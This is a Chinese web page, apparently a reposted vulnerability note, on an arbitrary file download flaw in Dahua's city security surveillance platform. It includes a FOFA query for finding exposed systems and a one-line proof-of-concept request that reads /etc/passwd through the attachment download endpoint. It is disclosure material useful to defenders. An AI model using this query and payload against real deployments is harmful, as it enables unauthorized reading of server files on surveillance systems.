银财中国网
大华城市安防监控系统平台管理存在任意文件下载漏洞
创始人
2024-05-25 19:28:31
0

大华城市安防监控系统平台管理存在任意文件下载漏洞

  • 1.大华城市安防监控系统平台管理存在任意文件下载漏洞
    • 1.1.漏洞描述
    • 1.2.漏洞影响
    • 1.3.FOFA
  • 2.漏洞复现
    • 2.1.登录页面
    • 2.2.抓包

1.大华城市安防监控系统平台管理存在任意文件下载漏洞

1.1.漏洞描述

  大华城市安防监控系统平台管理存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。

1.2.漏洞影响

  大华城市安防监控系统平台管理

1.3.FOFA

  “attachment_downloadByUrlAtt.action”

2.漏洞复现

2.1.登录页面

在这里插入图片描述

2.2.抓包

  刷新登录页面进行抓包,然后在数据包中添加POC。

POC:/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

在这里插入图片描述

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇:Linux删除软链接

下一篇:TypeScript快速入门———(一)TypeScript 介绍以及初体验

相关内容

热门资讯

喜欢穿一身黑的男生性格(喜欢穿... 今天百科达人给各位分享喜欢穿一身黑的男生性格的知识,其中也会对喜欢穿一身黑衣服的男人人好相处吗进行解...
发春是什么意思(思春和发春是什... 本篇文章极速百科给大家谈谈发春是什么意思,以及思春和发春是什么意思对应的知识点,希望对各位有所帮助,...
网络用语zl是什么意思(zl是... 今天给各位分享网络用语zl是什么意思的知识,其中也会对zl是啥意思是什么网络用语进行解释,如果能碰巧...
为什么酷狗音乐自己唱的歌不能下... 本篇文章极速百科小编给大家谈谈为什么酷狗音乐自己唱的歌不能下载到本地?,以及为什么酷狗下载的歌曲不是...
华为下载未安装的文件去哪找(华... 今天百科达人给各位分享华为下载未安装的文件去哪找的知识,其中也会对华为下载未安装的文件去哪找到进行解...
怎么往应用助手里添加应用(应用... 今天百科达人给各位分享怎么往应用助手里添加应用的知识,其中也会对应用助手怎么添加微信进行解释,如果能...
家里可以做假山养金鱼吗(假山能... 今天百科达人给各位分享家里可以做假山养金鱼吗的知识,其中也会对假山能放鱼缸里吗进行解释,如果能碰巧解...
四分五裂是什么生肖什么动物(四... 本篇文章极速百科小编给大家谈谈四分五裂是什么生肖什么动物,以及四分五裂打一生肖是什么对应的知识点,希...
一帆风顺二龙腾飞三阳开泰祝福语... 本篇文章极速百科给大家谈谈一帆风顺二龙腾飞三阳开泰祝福语,以及一帆风顺二龙腾飞三阳开泰祝福语结婚对应...
美团联名卡审核成功待激活(美团... 今天百科达人给各位分享美团联名卡审核成功待激活的知识,其中也会对美团联名卡审核未通过进行解释,如果能...